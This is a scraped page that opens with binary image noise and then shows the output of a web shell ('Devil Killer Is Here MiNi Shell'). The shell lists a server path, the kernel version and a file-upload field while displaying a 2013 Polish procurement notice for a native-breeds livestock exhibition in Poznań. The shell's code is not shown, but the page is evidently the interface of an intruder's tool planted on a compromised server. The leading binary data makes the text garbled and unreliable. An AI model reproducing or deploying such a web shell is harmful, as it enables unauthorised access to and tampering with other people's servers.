JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130405/134770-N-2013.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na kompleksowej realizacji i promocji projektu Organizacja ekspozycji ras rodzimych pod nazwą Krajowa Wystawa Ras Rodzimych</b><br>
<b>Numer ogłoszenia: 134770 - 2013; data zamieszczenia: 05.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 23, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fapa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na kompleksowej realizacji i promocji projektu Organizacja ekspozycji ras rodzimych pod nazwą Krajowa Wystawa Ras Rodzimych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja i promocja projektu Organizacja ekspozycji ras rodzimych pn. Krajowa Wystawa Ras Rodzimych w dniach 10-12 maja 2013 r. w Poznaniu, na terenie Międzynarodowych Targów Poznańskich, ul Głogowska 14, pawilon 4. W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją przedmiotu zamówienia. W celu zapewnienia prawidłowego funkcjonowania Biura Wykonawca zapewni: 1) osobę lub zespół osób zapewniający prawidłowe oraz terminowe wykonanie zadań Biura, 2) organizację pracy, umożliwiającą Zamawiającemu stały kontakt z przedstawicielami Biura, 3) co najmniej 1 numer telefonu, faksu i adres e-mail. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych. Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu. W ramach określonych wyżej zadań Biura Wykonawca zapewni w szczególności: 1. Zapewnienie promocji projektu Krajowa Wystawa Ras Rodzimych i zwierząt ras rodzimych. W ramach zadania Wykonawca zapewni: 1)  promocja na portalu internetowym, zgodnie  z poniższymi wymaganiami: umieszczenie na branżowym portalu internetowym o tematyce rolniczej, adresowanym do hodowców - banneru promującego  Wystawę,  umieszczonego na głównej stronie portalu minimum 2 tygodnie przed terminem Wystawy do 2 tygodni po zakończeniu Wystawy. Banner powinien spełniać wymagania techniczne: rozmiar min. 800 x 140 pixeli wykonany w technice flash minimum 3 zmieniające się obrazy banner interaktywny pełen kolor minimalna zawartość merytoryczna: tytuł wystawy, data, miejsce, logotypy i slogany wymienione w załączniku nr 7. Projekt graficzny baneru zostanie przedstawiony Zamawiającemu do akceptacji w terminie 3 dni od podpisania umowy. Adres portalu internetowego zostanie przedstawiony Zamawiającemu do akceptacji w terminie 3 dni od podpisania umowy. 2) druk i listwowanie plansz prezentujących 8 gatunków zwierząt ras rodzimych, przeznaczonych do dystrybucji przez Wykonawcę podczas i w związku z Wystawą, z zachowaniem poniższych wymagań: Plansze powinny spełniać wymagania techniczne: format 68 cm x 98 cm, kolor 4+0,  papier kreda błysk 170g/m2 + lakier, listwy metalowe góra/dół; nakład łączny  1040 sztuk, w tym: - plansze prezentujące rodzime rasy bydła, 130 szt.,  zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy świń, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy koni, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy owiec, 130 szt., zgodnie z projekt doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy kur, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy gęsi, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy kaczek, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego, - plansze prezentujące rodzime rasy zwierząt futerkowych, 130 szt., zgodnie z projektami doręczonymi przez Zamawiającego. Plansze będą zawierać zdjęcia ras rodzimych danego gatunku zwierząt wraz z tekstową charakterystyką poszczególnych ras. Zamawiający przekaże Wykonawcy projekty plansz dotyczących 8 gatunków zwierząt ras rodzimych w wersji elektronicznej w formacie pdf w terminie 3 dni roboczych od dnia podpisania umowy. Każda plansza musi zostać oznaczona przez Wykonawcę logotypami i sloganami wskazanymi w Załączniku nr 7. Wykonawca dostarczy plansze na Wystawę Ras Rodzimych i zamieści je na stoisku informacyjno - promocyjnym przez cały okres trwania Wystawy w celu ich dystrybucji pośród osób odwiedzających Wystawę. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 3) druk ulotek informacyjnych dotyczących 11 gatunków zwierząt ras rodzimych, przeznaczonych do dystrybucji przez Wykonawcę podczas i w związku z Wystawą, z zachowaniem poniższych wymagań: A.  dane techniczne: format A5, kolor 4+4,  papier   kreda błysk 170g/m2 + lakier, B.  nakład o łącznej liczbie 12 000 sztuk, z czego: a) ulotki dotyczące 5 ras rodzimych, zgodnie z projektami doręczonymi przez Zamawiającego,  4 stronicowe,   nakład 800 szt. dla każdej z ras, b) ulotki dotyczące 2 ras rodzimych, zgodnie z projektami doręczonymi przez Zamawiającego,  8  stronicowe, szyte drutem, nakład 2000 szt. dla każdej z ras, c) ulotki dotyczące 4 ras rodzimych, zgodnie z projektami doręczonymi przez Zamawiającego,  2 stronicowe, nakład 1000 szt. dla każdej z ras. Zamawiający przekaże Wykonawcy ulotki dotyczące 11 gatunków zwierząt ras rodzimych w wersji elektronicznej w formacie pdf w terminie 3 dni roboczych od dnia podpisania umowy. Pierwsza strona każdej ulotki musi zostać oznaczona przez Wykonawcę logotypami i sloganami wskazanymi w Załączniku nr 7. Wykonawca dostarczy ulotki na Wystawę Ras Rodzimych i zamieści je na stoisku informacyjno - promocyjnym przez cały okres trwania Wystawy w celu ich dystrybucji pośród osób odwiedzających Wystawę. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 4) druk 5 broszur dotyczących rodzimych ras zwierząt, przeznaczonych do dystrybucji podczas i w związku z Wystawą przez Wykonawcę, zgodnie z konspektami doręczonymi przez Zamawiającego, z zachowaniem poniższych wymagań: a) format B, kolor 4+4, b) papier środek: kreda błysk, 130 g/m2, c) papier okładka: kreda błysk 250 g/m2, + folia mat, d) oprawa zeszytowa, e) nakład 200 szt. każdego tytułu, f) ilość stron dla poszczególnych tytułów: Jagnięcina - wykorzystanie rodzimych ras owiec do produkcji jagnięciny - 68 stron Rodzime stada zachowawcze kaczek w aspekcie przydatności konsumpcyjnej w kuchniach regionalnych - 44 strony Drób realizacja programów ochrony zasobów genetycznych - 62 strony Owce realizacja programów ochrony zasobów genetycznych - 88 stron Nutrie program ochrony zasobów genetycznych szansą dla hodowców -56 stron Zamawiający przekaże Wykonawcy broszury w wersji elektronicznej w formacie pdf  w terminie 3 dni roboczych od dnia podpisania umowy. Okładka oraz strona tytułowa publikacji musi zostać oznaczona przez Wykonawcę logotypami i sloganami wskazanymi w Załączniku nr 7. Wykonawca dostarczy ulotki na Wystawę Ras Rodzimych i zamieści je na stoisku informacyjno - promocyjnym przez cały okres trwania Wystawy w celu ich dystrybucji pośród osób odwiedzających Wystawę. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 5) projekt graficzny i druk oraz dystrybucja plakatu zgodnie z zachowaniem poniższych elementów i wymagań: a) tytuł i termin wystawy, b) logotypy i slogany wskazane w załączniku nr 7, c) tło w formie zdjęcia zwierzęcia rasy rodzimej na całą wielkość plakatu d) wymiar plakatu 490 mm x 690 mm, e) papier kreda, pełny kolor, 4+0, papier 170 g/m2, kreda błysk; f) nakład - 500 sztuk Projekt graficzny zostanie przedstawiony Zamawiającemu do akceptacji w terminie 3 dni  od dnia podpisania umowy. Tematyka zdjęć użytych do ilustracji plakatu musi być związana z tematyką Wystawy. Zdjęcia przygotowane na potrzeby plakatu muszą być zdjęciami autorskimi. Nie mogą być wykorzystywane do innych materiałów przygotowywanych przez Wykonawcę, nie mogą też pochodzić z innych materiałów Wykonawcy. Wykonawca rozwiesi plakaty w miejscach publicznie dostępnych w siedzibach urzędów gmin, instytucji i podmiotów działających na rzecz rozwoju obszarów wiejskich w szczególności w siedzibach związków hodowców, ośrodkach doradztwa rolniczego, oddziałach powiatowych ARiMR i oddziałach terenowych ARR w terminie do 26.04.2013 r. Wykonawca przedstawi Zamawiającemu dowody dystrybucji plakatów zgodnie z postanowieniami niniejszego punktu. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 6) opracowanie, druk i dystrybucję zaproszeń na Krajową Wystawę Ras Rodzimych zawierających w szczególności: a) mapa dojazdu na miejsce wystawy, b) na pierwszej stronie zdjęcie lub grafika, c) logotypy i slogany wskazane w załączniku nr 7 do SIWZ d) tekst zaproszenia; Zaproszenia powinny spełniać wymagania techniczne: ilość - 500 sztuk rozmiar zaproszeń - składane, po złożeniu o wymiarach 210 mm wysokość i 148,5 mm szerokość kolor 4x4. Projekt graficzny zaproszenia oraz lista dystrybucyjna zaproszeń zostaną przedstawione zamawiającemu  w terminie 5 dni od dnia podpisania umowy do akceptacji. Tematyka grafiki i zdjęć użytych do ilustracji zaproszeń musi być związana z tematyką Wystawy. Zdjęcia i grafiki przygotowane na potrzeby zaproszeń muszą być zdjęciami autorskimi. Nie mogą być wykorzystywane do innych materiałów przygotowywanych przez Wykonawcę, nie mogą też pochodzić z innych materiałów Wykonawcy. Wykonawca wykona zadanie w terminie do dnia 26.04.2013 r. Wykonawca przedstawi Zamawiającemu dowody dystrybucji zaproszeń zgodnie z postanowieniami niniejszego punktu. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 7) przygotowanie i dystrybucja materiałów promocyjnych podczas i w związku z Wystawą, w tym: A. długopisów, z zachowaniem poniższych wymagań: a) długopis aluminiowy w kolorze zielonym, b) ilość - 1000 sztuk, c) wyposażony w niebieski wkład, d) wymiary: min. 140x10x10 mm, e) logotypy zostaną wykonane techniką laserową. B. koszulek promocyjnych, z zachowaniem poniższych wymagań: a) podkoszulek bawełniany, bawełna 100%, 165 g/m2, b) taśma wzdłuż karku, bez szwów bocznych, podwójny szef przy rękawach, c) kolor Bottle Green, d) rozmiar 25 szt-M, 50 szt-L, 25 szt-XL, e) nadruk w jednym kolorze z przodu i z tyłu, f) ilość łącznie - 100 sztuk; C. czapeczek promocyjnych, z zachowaniem poniższych wymagań: a) bawełniana czapka z daszkiem, 6 panelowa, regulowana za pomocą metalowego zapięcia, b) kolor zielony, c) nadruk w jednym kolorze, d) ilość - 100 sztuk; D. breloków, z zachowaniem poniższych wymagań: a) wzór: brelok-latarka, metalowa, z 3 żarówkami led i metalowym karabińczykiem, kolor niebieski, b) technika wykonania logotypów - grawer, c) ilość  - 500 sztuk; E. toreb papierowych, z zachowaniem poniższych wymagań: a) wymiary 32 x 12 x 40 cm (szer.x dno x wys.), b) kolor zielony, c) nadruk w jednym kolorze, d) papier typy Kraft prążkowany 100 g/m2, e) uchwyt papierowy skręcany w kolorze czarnym, wklejany do wnętrza torby, f)  ilość sztuk: 400. F. smyczy, z zachowaniem poniższych wymagań: a)  szerokość 10mm b)  zadruk obustronny 4+4, z karabińczykiem + wąs c)  długość nie mniejsza niż 60 cm d)   Ilość:  500 sztuk G. magnesów na lodówkę ze zdjęciami ras rodzimych, z zachowaniem poniższych wymagań a) spód z otwieraczem do kapsli i magnesem b) średnica górnej części 56 mm c) nadruk kolorowy 4+0 na papierze do 90 g/m2 d) ilość:  2000 sztuk H. Opracowanie i druk kolorowanki dla dzieci, z rasami rodzimymi, z zachowaniem poniższych wymagań: a) format A4 b) papier środek offset 80g/m2, kolor 4+0 c) papier okładka 170 g/m2, kolor 4+0, kartonik od spodu d)  oprawa klejona w blok e) ilość stron -10 f) rysunki powinny przedstawiać zwierzęta ras rodzimych g)  nakład:  400 sztuk I. banerów informacyjnych typu roll-up, z zachowaniem poniższych wymagań: a) wymiary: szer.: 100 cm wys.: 200 cm (netto), 212 cm (brutto) b) kaseta aluminiowa z 2 nogami stanowiącymi podstawę stojaka c) składany 3-częściowy masz aluminiowy d) nadruk kolor 4+0 na materiale dedykowanym do roll-upów e) zdjęcia mają przedstawiać zwierzęta ras rodzimych. f) Ilość: 4 szt. według projektów Wykonawcy. Wykonawca dostarczy wszystkie powyższe materiały na Wystawę Ras Rodzimych i zamieści je na stoisku informacyjno - promocyjnym przez cały okres trwania Wystawy w celu ich dystrybucji pośród osób odwiedzających Wystawę. Wykonawca dostarczy bannery na Wystawę Ras Rodzimych i zamieści je na stoisku informacyjno - promocyjnym przez cały okres trwania Wystawy. Wszystkie materiały promocyjne muszą zawierać logotypy i slogany wskazane w załączniku nr 7 zgodnie z Księgą Wizualizacji Znaku PROW dostępną na stronie www.minrol.gov.pl. Materiały promocyjne nie mogą zawierać reklam komercyjnych. Projekty graficzne wszystkich w/w materiałów promocyjnych Wykonawca przedstawi Zamawiającemu do akceptacji  w terminie 5 dni od podpisania umowy. Wykonawca dokona odbioru zgodnie z postanowieniami umowy, stanowiącej załącznik nr 11 do SIWZ. 2. Zapewnienie kompleksowej organizacji i obsługi Krajowej Wystawy Ras Rodzimych w dniach 09-12 maja 2013 r. w Poznaniu, na terenie Międzynarodowych Targów Poznańskich, ul. Głogowska 14, pawilon 4. W ramach zadania Wykonawca zapewni w szczególności: 1) Projekt, montaż i demontaż, wyposażenie oraz wizualizację graficzną stoiska informacyjnego (pow. 200 m2) zlokalizowanego w pawilonie 4,  zgodnie z poniższymi wymaganiami: a) Stoisko musi odpowiadać  ogólnie przyjętym normom i standardom wystawienniczym; b) Mieć cechy stoiska otwartego, przestronnego, funkcjonalnego; c) Zawierać zaplecze kuchenno-magazynowe (minimum trzy pomieszczenia zamykane na klucz), w którym zostaną uwzględnione pomieszczenia spełniające funkcje Kuchni (pomieszczenie zawierające: trzy lodówki o poj. 220 l, trzy regały 0,5x1,0x2,0 m, dwa zlewozmywaki, podgrzewacz wody, kuchenkę elektryczną dwupalnikową, stół kwadratowy, trzy krzesła oraz niezbędne pozostałe wyposażenie kuchenne) - pomieszczenie musi uwzględniać możliwość przygotowania ciepłych posiłków, doprowadzenia wody z odpływem, doprowadzenia energii elektrycznej. W pomieszczeniu muszą się zmieścić minimum dwie osoby; Magazynu - dwa pomieszczenia, zawierające regały, w każdym musi swobodnie zmieścić się minimum trzy osoby. d) Zawierać wyodrębnione 4 pomieszczenia, zamykane na klucz, ze stołami, krzesłami, szafkami, dostępem do energii elektrycznej. Jedno pomieszczenie powinno być wyposażone w stoły i krzesła dla minimum 16 osób. W jednym z pomieszczeń powinien być zapewniony dostęp do wody bieżącej. Pomieszczenia powinny być przeznaczone do spotkań ekspertów z wystawcami, gośćmi, na posiedzenia komisji sędziowskiej oceniającej zwierzęta, do przygotowania protokołów, dyplomów, prac administracyjnych związanych z Wystawą; e) Otwarta przestrzeń w obrębie stoiska powinna być wyposażona w dwa stojaki na prospekty, trzy lady ekspozycyjne w tym dwie w kształcie łuku, miejsca na kompozycje roślinne, stoły okrągłe i krzesła. f) Zawierać wyposażenie w sprzęt multimedialny (minimum 4 ekrany LCD 40 cali, 4 odtwarzacze DVD) za pomocą których mają być w sposób ciągły przez okres trwania wystawy prezentowane materiały dotyczące ochrony zasobów genetycznych zwierząt; g) Zapewniać bardzo dobre oświetlenie stoiska; h) Zapewnić przyłącze do Internetu Ethernet RJ45i) Uwzględniać wymagania właściciela powierzchni wystawienniczej - Międzynarodowych Targów Poznańskich Sp. z o.o. j) Tematyka zdjęć użytych do dekoracji stoiska musi być związana z tematyką Wystawy Wizualizacja musi uwzględniać logotyp Krajowego Koordynatora Ochrony Zasobów Genetycznych, który Zamawiający przekaże Wykonawcy na jego pisemne żądanie, oraz logotypy i slogany wskazane w załączniku nr 7. Wykonawca przedstawi Zamawiającemu dwa różne projekty zabudowy i wizualizacji stoiska w terminie 5 dni roboczych od dnia podpisania umowy. Wykonawca zapewni montaż i wyposażenie stoiska zgodnie z powyższymi wymaganiami do dnia 8.05.2013 r. do godz.  16:00 oraz demontaż do dnia 13.05.2013 r. 2) Funkcjonowanie stoiska informacyjnego, zgodnie z poniższymi wymaganiami: a) zapewnienie obsługi technicznej punktu informacyjnego, b) rozpowszechnianie materiałów informacyjno-promocyjnych, c) zapewnienie co najmniej 15 ekspertów świadczących usługi konsultacyjne dotyczące poszczególnych ras zwierząt prezentowanych podczas wystawy, dla Wystawców i odwiedzających Wystawę, w wymiarze 18 godzin w ciągu trzech dni każdy ekspert. Osoba występująca w charakterze eksperta musi posiadać wykształcenie wyższe adekwatne do tematyki wystawy oraz kwalifikacje, doświadczenie i dorobek naukowy z zakresu świadczonych konsultacji. 3. Zapewnienie noclegów ze śniadaniem dla ekspertów i obsługi technicznej w dniach od 08.05.2013 r. do 12.05.2013 r., w tym: a) nocleg w dniu 08/09.05.2013 r. dla maksymalnie 11 osób, b) nocleg w dniu 09/10.05.2013 r. dla maksymalnie 43 osób, c) nocleg w dniu 10/11.05.2013 r. dla maksymalnie 43 osób, d) nocleg w dniu 11/12.05.2013 r. dla maksymalnie 43 osób, zgodnie z poniższymi wymaganiami: a) hotel lub inny obiekt o standardzie trzygwiazdkowym lub równoważnym, położony w odległości do 10 km od miejsca Wystawy, b) pokoje jedno lub dwuosobowe, z pełnym węzłem sanitarnym; 4. zapewnienie wyżywienia dla ekspertów i obsługi technicznej w dniach od 10.05.2013 r. do 12.05.2013 r., w tym: obiad dwudaniowy z napojem w dniu 10.05.2013 r. dla maksymalnie 43 osób, obiad dwudaniowy z napojem w dniu 11.05.2013 r. dla maksymalnie 43 osób, obiad dwudaniowy z napojem w dniu 12.05.2013 r. dla maksymalnie 43 osób, na terenie Wystawy lub w miejscu noclegu. 5. Wybór i transport zwierząt na teren Międzynarodowych Targów Poznańskich w Poznaniu, ul. Głogowska 14, pawilon 4 i z powrotem oraz opieka nad zwierzętami, stanowiące część projektu, zgodnie z Regulaminem dla uczestników indywidualnych XXVI Krajowej Wystawy Zwierząt Hodowlanych  w Poznaniu stanowiącym załącznik nr 9 i Warunkami weterynaryjnymi dla zwierząt biorących udział w XXVI Krajowej Wystawie Zwierząt Hodowlanych na terenie MTP w Poznaniu w okresie 10 - 12 maja 2013 r. stanowiącym załącznik nr 8. W ramach zadania Wykonawca zapewni w szczególności: 1) wybór i zapewnienie zwierząt ras rodzimych prezentowanych na wystawie, zgodnie z wykazem zwierząt stanowiącym załącznik nr 10. Wyboru zwierząt Wykonawca dokona w porozumieniu z podmiotami prowadzącymi księgi gatunków zwierząt na podstawie: wzorca rasowego, fenotypu (pokroju), zdrowotności oraz oceny wartości użytkowej i hodowlanej.  Wyboru zwierząt dokonają eksperci z doświadczeniem w zakresie oceny zwierząt poszczególnych gatunków, z wykształceniem wyższym adekwatnym do tematyki wystawy oraz kwalifikacjami i dorobkiem naukowym z zakresu usług świadczonych w związku z Projektem. 2) transport zwierząt  dostosowany do gatunków i ilości zwierząt z miejsca ich pobytu na teren wystawy oraz zapewnienie transportu w drodze powrotnej zgodnie z załącznikiem nr 9. Samochody specjalistyczne do transportu zwierząt muszą posiadać stosowne decyzje wydane przez właściwego terytorialnie Powiatowego Lekarza Weterynarii zgodnie z załącznikiem nr 8. Zwierzęta zostaną załadowane do środków transportu uprzednio oczyszczonych i odkażonych. Wykonanie odkażenia będzie odnotowane w świadectwie zdrowia lub w książeczce dezynfekcji środka transportu przez urzędowego lekarza weterynarii. 3) opiekę nad zwierzętami w trakcie transportu oraz podczas pobytu na Wystawie, z pojeniem, karmieniem i niezbędną pielęgnacją dostosowaną do każdego z gatunków zgodnie z załącznikiem nr 9 a także opieką weterynaryjną zgodną z załącznikiem nr 8. Osoby obsługujące zwierzęta winny być zaopatrzone w odzież ochronną oraz wydzielony sprzęt do pojenia, karmienia i pielęgnacji zwierząt zgodnie z załącznikiem nr 9. Wykonawca zobowiązany jest do zapewnienia odpowiednich warunków weterynaryjnych i dobrostanu zwierząt podczas transportu, zgodnie z obowiązującym Rozporządzeniem Rady (WE) nr 1/2005 z 22 grudnia 2004 r. w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniające dyrektywy 64/432/EWG i rozporządzenie (WE) nr 1255/97 (Dz. Urz. UE L 3 z 5.01.2005, str.1 ze zm.), oraz przepisów ustawy z 21 sierpnia 1997 r. o ochronie zwierząt, t.j. z 2003 r. Dz. U. Nr 106, poz. 1002 ze zm., a także przepisów rozporządzenia MRiRW z 26 kwietnia 2004 r. w sprawie szczegółowych wymagań weterynaryjnych dla prowadzenia działalności w zakresie zarobkowego przewozu zwierząt lub przewozu zwierząt wykonywanego w związku z prowadzeniem innej działalności gospodarczej, Dz. U. Nr 100, poz. 1012. 4) oznakowanie stanowisk dla zwierząt w czasie trwania Wystawy tabliczkami informacyjnymi umieszczonymi na stanowiskach oraz kieszeniami naściennymi na ulotki. Tabliczki muszą zostać oznakowane logotypami i sloganami wskazanymi w Załączniku nr 7. Wszelkich akceptacji, o których mowa w SIWZ, Zamawiający dokona pisemnie, faksem lub e-mailem, chyba, że załączona umowa stanowi inaczej. Pozostałe warunki dotyczące realizacji przedmiotu zamówienia zawiera wzór umowy, stanowiący załącznik nr 11 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.34.22.00-5, 55.10.00.00-1, 55.30.00.00-3, 79.80.00.00-2, 66.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
